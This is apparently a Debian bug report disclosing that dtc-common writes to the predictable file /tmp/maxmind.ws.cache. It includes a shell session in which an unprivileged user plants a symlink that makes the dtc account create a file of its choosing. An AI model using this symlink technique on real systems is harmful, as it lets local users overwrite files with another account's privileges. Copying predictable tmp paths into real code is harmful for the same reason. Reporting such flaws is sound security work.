#637619 dtc-common: predictable tmpfile create allows symlink attack

#637619#5
Date:
2011-08-13 05:20:36 UTC
From:
To:
If maxmind is enabled, it uses the predictable filename: /tmp/maxmind.ws.cache allowing a symlink to use the dtc priveleges to overwrite a file:

nobody@testdtc:/$ whoami
nobody
nobody@testdtc:/$ ln -s /var/lib/dtc/etc/cband_scores/foo /tmp/maxmind.ws.cache
nobody@testdtc:/$ ls -l  /var/lib/dtc/etc/cband_scores/foo
ls: cannot access /var/lib/dtc/etc/cband_scores/foo: No such file or directory

... then a new user registers...

nobody@testdtc:/$ ls -l  /var/lib/dtc/etc/cband_scores/foo
-rw-r--r-- 1 dtc dtcgrp 38 Aug 13 01:17 /var/lib/dtc/etc/cband_scores/foo
nobody@testdtc:/$ cat /var/lib/dtc/etc/cband_scores/foo
208.43.124.50;74.86.25.131
1313212635